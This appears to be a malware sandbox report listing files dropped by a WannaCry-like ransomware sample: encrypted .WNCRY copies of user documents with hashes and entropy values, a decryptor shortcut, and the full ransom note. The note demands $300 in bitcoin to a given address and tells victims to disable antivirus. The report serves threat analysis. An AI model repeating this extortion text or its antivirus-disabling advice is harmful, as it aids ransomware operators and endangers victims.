                                Preview:..U...:!.W._4*.........{<..b...+.[.-eO..c......>IR...{<1.>.......=...0.W/.W}.......Q..L.Z..7..$...1f;....[...f..H..v....k2..:...l.6I.T...(}.W@.V.0R.R~.~.D..dAS.r%U[..j.,...4.f..'.!......p......`;..8.....`..k...W..c.U..v6.......:\w..q.R.sg?.D..TtL....C..Si0....Jx#....P..IV/;..)...\.M&e...&.w.R.......zhz ......)../..J..[g...u.oqZ..["o....t.d.*v ..S.]*#...R.~6.W..t.k..&.bS..h}.Z0.....mAu.Tc'......<...........=.s..@...E.K.w^4...g.)|...Uy.3.....34".-....A\.=p..K.W.)..+..j`cG.....3I|';d.&.pcl.+K.......Qto7....A.4d..W.n...2...........=c..........V,'y U....$m..=u.w.D..3.A..A.Q3..N>.(3\..r.Ye......+{..O_.......x`y.a..cb.Z..ph.@z."f....s...=IZ.Z....W..N.k.0b(....A.'._M.^..Y<.+x.EC.BY...c.B.tEg8D-.`.N/Kd......\...M...O.|.$..'....1.Ma.0....l.?....}.5./....i"....$...<.N......*..|]#./g+.c4.....\.=.q....n.....R.w..g...v$2..2.b`.j.-.....5..~F.A1../`.....g[@.....r..(".6..7&..L=.V...>.....HK...f..@..i.K|.........n..W..\G..-.`........%.t.D.sa.....f.uP~

                                C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.823705150100479
                                Encrypted:false
                                SSDEEP:24:bkDv7OgyefoKitdnGK9mKPnd4StMmwVcgk23e8WndyywM0iQ5iGieizn:bk77OBKAGK9dl3Yqv23e8Ugu0iQ5iGid
                                MD5:C28954C207A0DD2576A857FC5A4B0933
                                SHA1:96F0FE7E36C159F2C1A043881C3A926E6919371F
                                SHA-256:6817DA60B5DC619BA500D6C75DCB4171AC15497DF86947CFF2DFD97722C8A9EB
                                SHA-512:5B037B093E8E0FF56D5643DA874CC7DF44C1C90A940E2AB1F3E136F38A81BB1A4BBFB1407ECCD72A8C2ED03B20CF10093A3C69844E84613CB4FE0E26180E74B4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....n>f.....e....HR....d........_.1..R...'_....EW'....D....rd!...h..... a...J.h.;.:..........0.....+m]..C..w...K...\."X....N.I.u,.hG...FN..yS6.z..R.....y}9......2).3...A....u....2..\.9..r8w....|jJ..+..T...}..sZ..Qy....F...+....3.?.Ih.=.i...fv...............gH...g.....:AB...j.YC.t;.PE....Xm,@..TV.F..v...D.._`t....q.m.7!.6i.)...).3..J....'WP...f#{......-O..y.a....;#.....+Q`........{...C.R._"..S?HA.....vc...F.}.....,.W....?.*....E!.>...@...AP..2/-[......./K.N.....bL@.1Z.Rw..].6<o0?........@.....!.h.(!l..T..a.....^..j...C*maZ..2...N.....8.6/..P.Q.0@..8.....J....^.....C!.y...|...9].....4.........uy..Lk.N..\.eqQ..@X...=.z.H.rn.Q..U......5(.K.9.i.%hAJ..n..../W...-Zg ...]..v..e....i......P!.c.t..j....W.V...a..UR.....5.[..??.v.X..R..J.S.2.?....2......P.....Dq).B'\.F.5..8............Uu.f..M.y*Q..1.@........K.....X.n...IfW....)B...L.P.<...q@.G,..s.(......4'./.....N.1%qn..a%?YN.NB.Y{...q..k...d,].4..P....C.....QS....y...y.`.A.7.]]..y...G.

                                C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.823705150100479
                                Encrypted:false
                                SSDEEP:24:bkDv7OgyefoKitdnGK9mKPnd4StMmwVcgk23e8WndyywM0iQ5iGieizn:bk77OBKAGK9dl3Yqv23e8Ugu0iQ5iGid
                                MD5:C28954C207A0DD2576A857FC5A4B0933
                                SHA1:96F0FE7E36C159F2C1A043881C3A926E6919371F
                                SHA-256:6817DA60B5DC619BA500D6C75DCB4171AC15497DF86947CFF2DFD97722C8A9EB
                                SHA-512:5B037B093E8E0FF56D5643DA874CC7DF44C1C90A940E2AB1F3E136F38A81BB1A4BBFB1407ECCD72A8C2ED03B20CF10093A3C69844E84613CB4FE0E26180E74B4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....n>f.....e....HR....d........_.1..R...'_....EW'....D....rd!...h..... a...J.h.;.:..........0.....+m]..C..w...K...\."X....N.I.u,.hG...FN..yS6.z..R.....y}9......2).3...A....u....2..\.9..r8w....|jJ..+..T...}..sZ..Qy....F...+....3.?.Ih.=.i...fv...............gH...g.....:AB...j.YC.t;.PE....Xm,@..TV.F..v...D.._`t....q.m.7!.6i.)...).3..J....'WP...f#{......-O..y.a....;#.....+Q`........{...C.R._"..S?HA.....vc...F.}.....,.W....?.*....E!.>...@...AP..2/-[......./K.N.....bL@.1Z.Rw..].6<o0?........@.....!.h.(!l..T..a.....^..j...C*maZ..2...N.....8.6/..P.Q.0@..8.....J....^.....C!.y...|...9].....4.........uy..Lk.N..\.eqQ..@X...=.z.H.rn.Q..U......5(.K.9.i.%hAJ..n..../W...-Zg ...]..v..e....i......P!.c.t..j....W.V...a..UR.....5.[..??.v.X..R..J.S.2.?....2......P.....Dq).B'\.F.5..8............Uu.f..M.y*Q..1.@........K.....X.n...IfW....)B...L.P.<...q@.G,..s.(......4'./.....N.1%qn..a%?YN.NB.Y{...q..k...d,].4..P....C.....QS....y...y.`.A.7.]]..y...G.

                                C:\Users\user\Desktop\PIVFAGEAAV\SQSJKEBWDT.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.825947631419461
                                Encrypted:false
                                SSDEEP:24:x7fp0oPdc2SyCci1kZGnZXlKZ8Q9YQtbceGXO:pyH2l54nFwp9Dae
                                MD5:F12D1648D4DD7E55B38838B51FF65918
                                SHA1:35C143B201608C7CF6A0ADF55971C0AACFE1B1B2
                                SHA-256:44A8AFFD77EAC7203F9CDB7314BC306A517D006B46ACAA35C69D682010490A0D
                                SHA-512:45122A4550CD9B040E3F4052BA9E4E472585BB9EF082D7CD968D6F0B8BD153B78E60D4B52D3851C9460CF4EB7429A0D3DC8213BAE6C8D4088E3D5D27FA8D51D2
                                Malicious:false
                                Reputation:unknown
                                Preview:.y......z.lW..g.gO.R....]......<...xBp..Z......z\.V.-Z..*....w."...b.-^...W.)....Pk..7..f.....w..f....OE.e7.o...Pag..&..K:.8.vP.MNw.9n.L....<w%H%..v...n..$.C=.IK...@...Bz....8"..m........}.@....?...I./,.I..v..f....~y.......s.\.......T[d.Z....U.e^\m.s..>.DW...W.f.n^.b.{..,m..wN....6X../X....X.q,I..\..z.......R..i..-XO}_......,?.B...p...4V.1...>.P...?.....L...r...,.)..P..ka...<u.>.+.%.*.wT.w.{..L&.../....... . .y.j.4..(F...f.K.....x.1.V.^)4W...0kYsr..0 ..Z.|.n.#..[....B....T.>H..[*0A.0...........U..VNTO..)..T.L.pj.{..d......].*-,..3.dH....=..F...CK!,....w..L..j~....x..k...T......~....}.......]6....x&H..V...#@..=..p..... .3.4!ZB.b...l.....UE.~y9,].nz......@n.G...f..U..f...........(dZx.~.'z....Ng...../..o...`o.gll.;..%[.l.#.#.(Ug....r.]...$.D'!....$.....p_.. .?.h....r..FF.S...~...o?...9K.....{J+..x.4.....l..xC.x...4..y..ir.RD..../.6E....f.Y.-.D.d...u...6.c.f..Kq:.oz.h..^.N.0........w......."\<U..j5......~.]*<..m.A.@Hmi[<qia...)...........

                                C:\Users\user\Desktop\PIVFAGEAAV\SQSJKEBWDT.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832260462943057
                                Encrypted:false
                                SSDEEP:24:bkeXWzcWbEsd/we+8Yg6mS3lE9+uPLL5qLgzAuVdh1KcmBgoj63vaDr:bkvc/sRwe+BgCE9+u5qeAM1gDj6Mr
                                MD5:5851A2BABAC8726697D1BBEA73841D4E
                                SHA1:53C26995290A4BE023C34018C4CBDFD6083F0BE2
                                SHA-256:EDC0C1527E600355EFE64972112C6B847DB5E3F22CFE8ACCCDD23DD9A626E951
                                SHA-512:819F71457D232508CE4C270EA0D4882BCB16D285599F273152C3004B91643E1B52AF841FA2EFE6A1A9F3CFBF86C1036AFCC9EA2EF56F5FEABE4C5FDA411713F5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....|........l...........T.....J.L.F.~.:....aE...L./.`..`.aUI4.g.*.5.=N...0..&c...uP"`.j..5RB..32Uv.'j...,.>=.:.n......~.+s...uAE..8....#.....K.8.h.eL..J...3...Y..../.?4.3.........-.A1.?q.6.+W...........Eq.....J.....V?E.8....7.._g.:]YS.0.....O.Rd\.$..............D.Hi....(..r"...lA...c.F....8..v..d8.....b..~.....@.........>......g.+c:h....\...Yb8.]>.]..B..../..G.W..Zf_.[m8rN..p+..5.$.[..6..U..x.^Z.(.L...u@.7A.cd1CB..2yI_.l.>cD^..BVd.[6..?.D..O......,.......~-.........y{.q..z.x..U.Ir[..aO..T.}?...n.$@.7..."......e.....\...V..e~,........D..a....o....F.......Jae..C.Y.5.^.{.s3._...h.........u..(."/.rp..Z.....wb...\k]C-.M......h'...wb.J.9..S...w.......bn..H.2....G..N..n*..I.Y5..-{.....!.B...!o..n...8;mp:..s1|..m..k..\.'..d6..-.=....)B.W..a.b.&...>....V.........+.N.}.e..Y..W...d..)./.ip....l.q..m-.....o.-/..`f.6%'.....,Z..\.;.'5....M.:!H&"2..?.,.z.2@f!_....:(J..;0X..".6.`.Y...cR.[y ..c6......*..$...m...Ka..-..,..../3..E2...g..._M.-

                                C:\Users\user\Desktop\PIVFAGEAAV\SQSJKEBWDT.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832260462943057
                                Encrypted:false
                                SSDEEP:24:bkeXWzcWbEsd/we+8Yg6mS3lE9+uPLL5qLgzAuVdh1KcmBgoj63vaDr:bkvc/sRwe+BgCE9+u5qeAM1gDj6Mr
                                MD5:5851A2BABAC8726697D1BBEA73841D4E
                                SHA1:53C26995290A4BE023C34018C4CBDFD6083F0BE2
                                SHA-256:EDC0C1527E600355EFE64972112C6B847DB5E3F22CFE8ACCCDD23DD9A626E951
                                SHA-512:819F71457D232508CE4C270EA0D4882BCB16D285599F273152C3004B91643E1B52AF841FA2EFE6A1A9F3CFBF86C1036AFCC9EA2EF56F5FEABE4C5FDA411713F5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....|........l...........T.....J.L.F.~.:....aE...L./.`..`.aUI4.g.*.5.=N...0..&c...uP"`.j..5RB..32Uv.'j...,.>=.:.n......~.+s...uAE..8....#.....K.8.h.eL..J...3...Y..../.?4.3.........-.A1.?q.6.+W...........Eq.....J.....V?E.8....7.._g.:]YS.0.....O.Rd\.$..............D.Hi....(..r"...lA...c.F....8..v..d8.....b..~.....@.........>......g.+c:h....\...Yb8.]>.]..B..../..G.W..Zf_.[m8rN..p+..5.$.[..6..U..x.^Z.(.L...u@.7A.cd1CB..2yI_.l.>cD^..BVd.[6..?.D..O......,.......~-.........y{.q..z.x..U.Ir[..aO..T.}?...n.$@.7..."......e.....\...V..e~,........D..a....o....F.......Jae..C.Y.5.^.{.s3._...h.........u..(."/.rp..Z.....wb...\k]C-.M......h'...wb.J.9..S...w.......bn..H.2....G..N..n*..I.Y5..-{.....!.B...!o..n...8;mp:..s1|..m..k..\.'..d6..-.=....)B.W..a.b.&...>....V.........+.N.}.e..Y..W...d..)./.ip....l.q..m-.....o.-/..`f.6%'.....,Z..\.;.'5....M.:!H&"2..?.,.z.2@f!_....:(J..;0X..".6.`.Y...cR.[y ..c6......*..$...m...Ka..-..,..../3..E2...g..._M.-

                                C:\Users\user\Desktop\SQSJKEBWDT.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.803036648864622
                                Encrypted:false
                                SSDEEP:24:63gosUjTZ7Yqjg+DDRmEPrX8dS/GkcP4ORN9OYMUjE:aTR9VPRmEOBP44N9jMUjE
                                MD5:D380E9430EC3C916615F414F70A99D18
                                SHA1:6489F23BD40C44AE0337423A2DC43CBA6EC84EBB
                                SHA-256:A25196FEED0198DF77D61635729AF0995912FADC6C906E7859888952B781180F
                                SHA-512:BF15FD186486211CC98EF2CEF40B6E66BA6723C8660EC2B5BB42BBFBDFCF55458B4C91DC845D8C5F1C7B4734272601D6C2381C0E8382BBB52731A19F3B984E9E
                                Malicious:false
                                Reputation:unknown
                                Preview:...H...p.@.u.wl.% .4......AZ.y..u........EKj5...t.lE......U...;..I..]edf.. 2oR>.}.1"...D.#..w...[a1Z....!b.7$..J..o9.....;...='...\w.........._l.....P.............)}..... ..>r...$...>.....In,?=[aepN_.Wdy.p..E.2.O3p.j......j^.+...P....v....W?.j..l.qG....."+.....8..C.U.A./..V..3.<".0...f.hJ.....C.F......>T......3F.<..1o.Uvu.........i....#.B...*....+..1..g......f.k..I.<F'.@.5.r..e#.^..'.U.P.G..b,.H..e.ce...&."....W..*.,..;d.?.P.5t.....F....Y...!.b..+%0k....L.0:q.18t.Sb.o....B...E.$..lub...Zk.;R.l......GGl.B.>....L..dt..= .....9..U......{.......VF..Y....3EJg!|}.].Y)..,...........Fa.C*bU.d...9b}.......A..F..?...p.6..f.......?...{.T...'..P[6.<..S.U.@mDf.@.8f...X......SG...ow..{}U.=.3i}zF..=....w...=.DLq...%.+...y&........<..58'.rJ<C`..L9.W&g.C.P.>..I...1N8W..x].......6.=F...w..,bz/.........6...?.m.....@..1..6-....&.*3.mY...B_.>...w..-L....E...`<.L/Ak...L....+.V....dy..%..@v.h.A.......0._K..Z.|.d.Px......iY...q..7....=TI.M._.zR.[L....!G.x...2.

                                C:\Users\user\Desktop\SQSJKEBWDT.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854414447472964
                                Encrypted:false
                                SSDEEP:24:bk0zZB5VvEjKZcipaOMw1gpnIE3VLk60/+CZr6IS0v7N78xN7sVAG4ypOEf1:bkoj5VvyMgWbVjl79jmxJsVJpxf1
                                MD5:9B0F5AAB8DE2FA5874BF2C3D97ACDE6D
                                SHA1:8706BE37720C2EFA053BB7E4F08714FF14052C38
                                SHA-256:EB42F16D0565971DB5373A0F250F3121019CBC3FF453A2BEF3C2AA835D34E53E
                                SHA-512:6973A1CA6841D84D6BC2BDBC6BB6503C1F210E77DF786BB8A637CD91BE1117E26F8D3B33816F4064EA2945A06007B2A47AAB64B2F62EAA852D1CF4797A614E59
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....$..s.n[.j.Y8.f.qndT.......?.v..9Y./b.h..S^.v{.C..-.@..F..9..;..........E?n..4.....)..N_..0.....vI.(P...od....H..-.....W.X./..........\3..mU..[....Mm....h.J....A)....-..U.*...o..7.]rk. ..4.I70\.I..c...s*.p...Iv!..E......F.j...1...._..3..T.............n..|_...!..K^gq.0...Gy4N.\.6a.....F..%w....2...3.C.A.G.x_.<.....o.$%,.P@.,4...@9.-3(^.....b...YTq".#S....Y..`..!1../.1...N..".......1XUJ..+E.....l....,...4. q=Q.i$q..v...8.Y+t...U..;+....t.D..%)>..ld..E\.K.IQ.......X..J.$+;5.Du.t.......>l!...h.;......[...$..^P....-d...0~}wKk....n.....#.3eV..!.K..L..V...+.... .sa!<.V....,..8..9a.Z4._n..B...V....rA.f...A&1A._H}...$!....}Q.`.6.[].....\..1G..p... .....1.dS.).}|bq.[....<^o.m......>..@pt)u@.U.6....X..p>..uUl..6...#...]...<.>.:s..J.....=sjI.)........\F]..Q....._;..ss..ZgP..N...D.|....x......%h.....O.O.2...z.u.....{.~..38C.5...6<_...&.1OJ.'...`ZK..SA:H..~.z.~...=w.v.d..s...;.M.....@...r.x....q.G.qp.W..........A..U..".......z...g...

                                C:\Users\user\Desktop\SQSJKEBWDT.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854414447472964
                                Encrypted:false
                                SSDEEP:24:bk0zZB5VvEjKZcipaOMw1gpnIE3VLk60/+CZr6IS0v7N78xN7sVAG4ypOEf1:bkoj5VvyMgWbVjl79jmxJsVJpxf1
                                MD5:9B0F5AAB8DE2FA5874BF2C3D97ACDE6D
                                SHA1:8706BE37720C2EFA053BB7E4F08714FF14052C38
                                SHA-256:EB42F16D0565971DB5373A0F250F3121019CBC3FF453A2BEF3C2AA835D34E53E
                                SHA-512:6973A1CA6841D84D6BC2BDBC6BB6503C1F210E77DF786BB8A637CD91BE1117E26F8D3B33816F4064EA2945A06007B2A47AAB64B2F62EAA852D1CF4797A614E59
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....$..s.n[.j.Y8.f.qndT.......?.v..9Y./b.h..S^.v{.C..-.@..F..9..;..........E?n..4.....)..N_..0.....vI.(P...od....H..-.....W.X./..........\3..mU..[....Mm....h.J....A)....-..U.*...o..7.]rk. ..4.I70\.I..c...s*.p...Iv!..E......F.j...1...._..3..T.............n..|_...!..K^gq.0...Gy4N.\.6a.....F..%w....2...3.C.A.G.x_.<.....o.$%,.P@.,4...@9.-3(^.....b...YTq".#S....Y..`..!1../.1...N..".......1XUJ..+E.....l....,...4. q=Q.i$q..v...8.Y+t...U..;+....t.D..%)>..ld..E\.K.IQ.......X..J.$+;5.Du.t.......>l!...h.;......[...$..^P....-d...0~}wKk....n.....#.3eV..!.K..L..V...+.... .sa!<.V....,..8..9a.Z4._n..B...V....rA.f...A&1A._H}...$!....}Q.`.6.[].....\..1G..p... .....1.dS.).}|bq.[....<^o.m......>..@pt)u@.U.6....X..p>..uUl..6...#...]...<.>.:s..J.....=sjI.)........\F]..Q....._;..ss..ZgP..N...D.|....x......%h.....O.O.2...z.u.....{.~..38C.5...6<_...&.1OJ.'...`ZK..SA:H..~.z.~...=w.v.d..s...;.M.....@...r.x....q.G.qp.W..........A..U..".......z...g...

                                C:\Users\user\Desktop\SQSJKEBWDT.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.823508414706776
                                Encrypted:false
                                SSDEEP:24:cSEeJLSdKuxe/9qQvFGOOu815e1nkQC3fd9ZR/H8zi75:cmLrD/gQvFGbL1wtkQsjZq05
                                MD5:E531D7DBB5C2D74868AE5FE3EBD3C215
                                SHA1:79FBB4A5CB79BB2AB8C70C8E5E6E034341BB30AB
                                SHA-256:9A296B59302919774850BCE22244D71429CF412418C126AC6EC6DA1C6AA7F1DB
                                SHA-512:0A6B8D339619BE8130D2B35F42990376214A7B9F71B3B613482197589F37D3012003B93986563CC1DC49A7FF1A8DA10BD4C424E25896F95190E31AEA69F96F0B
                                Malicious:false
                                Reputation:unknown
                                Preview:..{A.....O.XR.".L.]...?.._J.Pvc.MB.{.....o9..'=..R..>.'.JD.9}..EPwMj..0..g.[...4..\".Xs.Uz...pv^.W.........f.wgo.D%.E1.f......@X.0E`.....u..+...e.....P.n.-js..l.aN.ZB[qH.B.NS.*/..:.......gV`gP'...<....h[..._../.......$./>../.....p+_......Z...{S...g.4...?n...`...6W,Sp..i...+k..h)0ks.^.;.+G9Wk7..:k-..6~U.h.H.t~.....&...r+...........b...P....V.f..2.I5v....0...e....cj...V.......CHX..o=g..`.V.....J.wY.M.....]..(\.......\.V.~..m=M9..L..=...A.K. . ..be..V=.zXLr.<.K.G...SB..K.g..O..W...&1.T7.9...A%4J.-.z..qCB..;l.P..o.og#9:....;.......r@.Q.!)%....n.&....Bf..#|.9.".....V...7Qdo.s.g...G,..j3./.\.E.q....>s00.r..s.m.>..j...P..d.P5..@I|.*.........YE.fP......dJ(.. N&.5.O.H....1.R-.J.<.)e..iB.-.l...l.4?X..z.I.s.|.*B..B...car"&z07.S....\...7..0...Pl*'.....;.....(...9.....u..c..[O'+[..3jzk...FU.vw..L=+|+U.b....z.....%..._..:.8..j...q.G/.....J..F\.....>i..._L.).Ju+U...>.H.....4W^.x.....r.p.......K!...9p.F..4.>...]4.....G.~k.:...W...........%P.X...IQ....!.

                                C:\Users\user\Desktop\SQSJKEBWDT.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8422718049087745
                                Encrypted:false
                                SSDEEP:24:bkq3nby5zbBC2itcclHD85GaV1dH0q06U85+Qo1/1Ck3MCt+PQkIxTv8SqROFUJ:bkabytw228GabdH0q5+QMjoKxTv8REFG
                                MD5:F0682F3B25DD0D8BC9D6E136E061A1DD
                                SHA1:FDB9DA6A01C6405036694AE9B2FBF8ACBF3AFD67
                                SHA-256:F0C299A4C04A469EF66B390240428C7DC7F25606FCA13836BB7259E5E88D3F23
                                SHA-512:1F77662A260F4FDC4550A3C9E2A35F763BEDE1D161C488CC5DE997969CBE912355B9B3F4FBC472EA65E85973A50F67CA37F22391646D90CBC99D84C30CB478E5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......g.4.?.'.0...aO.. ..;.XE`x..&C,Y._..*g...(x.l-.z.......y!..h.mr.;...X.:bI.].E..<......A.].g..$JJ..L.......>..@(o........8sW.......v.......!.}.E..E\...|w.BM...#`..n.k....:.:r.-...g.G...:. .&..".]&..L...Vm.}g...ha,.h..Ps.b..W.DLz..e..&P.................L...a.}.j.u5g..|..T._.......fD2y.A 5.4Qk."...56.*..H........i..^.......C...*..m.|..8...$rJ).-...Q+ .....L.........>.H..........x)#/E...2.....L ..WC.<..C..kIw......5..m5....%JMA....b,"..'w8|d>.5....4.....m.........4^d..)3y..o.c.........m. a..i..(........b..3Q.,.S.B.8..t.CB8r+S.......j>F...~...]a.yq....~H.........f....(...s.%....f...,x...6...1.....~..D]......m..B..6\(..yC......wP:..vt..X..|....8.g(.V..\9j..S.!...)w:.iUX.2..../.....xQ..{............]....../`....E.@YQ..T........5....bi../.3\]..Mz.']y.#'..R....X.?..Y...........dhi.J.\S.zP...Q)..h..3...'....].X".G..O.}..Z/.Kt 6....]!.~.......n.Z.qQ.9.3I.. qD.................`...' F.48K"....c..cw.=....Z.......q....k9.......)|P.55t

                                C:\Users\user\Desktop\SQSJKEBWDT.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8422718049087745
                                Encrypted:false
                                SSDEEP:24:bkq3nby5zbBC2itcclHD85GaV1dH0q06U85+Qo1/1Ck3MCt+PQkIxTv8SqROFUJ:bkabytw228GabdH0q5+QMjoKxTv8REFG
                                MD5:F0682F3B25DD0D8BC9D6E136E061A1DD
                                SHA1:FDB9DA6A01C6405036694AE9B2FBF8ACBF3AFD67
                                SHA-256:F0C299A4C04A469EF66B390240428C7DC7F25606FCA13836BB7259E5E88D3F23
                                SHA-512:1F77662A260F4FDC4550A3C9E2A35F763BEDE1D161C488CC5DE997969CBE912355B9B3F4FBC472EA65E85973A50F67CA37F22391646D90CBC99D84C30CB478E5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......g.4.?.'.0...aO.. ..;.XE`x..&C,Y._..*g...(x.l-.z.......y!..h.mr.;...X.:bI.].E..<......A.].g..$JJ..L.......>..@(o........8sW.......v.......!.}.E..E\...|w.BM...#`..n.k....:.:r.-...g.G...:. .&..".]&..L...Vm.}g...ha,.h..Ps.b..W.DLz..e..&P.................L...a.}.j.u5g..|..T._.......fD2y.A 5.4Qk."...56.*..H........i..^.......C...*..m.|..8...$rJ).-...Q+ .....L.........>.H..........x)#/E...2.....L ..WC.<..C..kIw......5..m5....%JMA....b,"..'w8|d>.5....4.....m.........4^d..)3y..o.c.........m. a..i..(........b..3Q.,.S.B.8..t.CB8r+S.......j>F...~...]a.yq....~H.........f....(...s.%....f...,x...6...1.....~..D]......m..B..6\(..yC......wP:..vt..X..|....8.g(.V..\9j..S.!...)w:.iUX.2..../.....xQ..{............]....../`....E.@YQ..T........5....bi../.3\]..Mz.']y.#'..R....X.?..Y...........dhi.J.\S.zP...Q)..h..3...'....].X".G..O.}..Z/.Kt 6....]!.~.......n.Z.qQ.9.3I.. qD.................`...' F.48K"....c..cw.=....Z.......q....k9.......)|P.55t

                                C:\Users\user\Desktop\SQSJKEBWDT\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\Desktop\SQSJKEBWDT\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\Desktop\SQSJKEBWDT\EFOYFBOLXA.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.805870365285327
                                Encrypted:false
                                SSDEEP:24:oNHdJZJeZTrA3iFrxE8ZddkmMGTB/X6sep9bFAH2Rdif:oNHDZJehYExE8ZddkmMGTB/83+f
                                MD5:7745D67B7C22803C81ED9D8E812A8B01
                                SHA1:F52AE856058EF970BE5919116720631B9328B4EA
                                SHA-256:10EF5F117AD7BC31B19567BC638C688A731826CFFFFEDCD60C1121CAD326B92B
                                SHA-512:B143E08127E9258A4AFA0316CF255DAABAD28BD84423E64A7158A742B45269D5E22EF3C002C83855140764592B1FDBA588C751CCEFAD34347FB876D687279A73
                                Malicious:false
                                Reputation:unknown
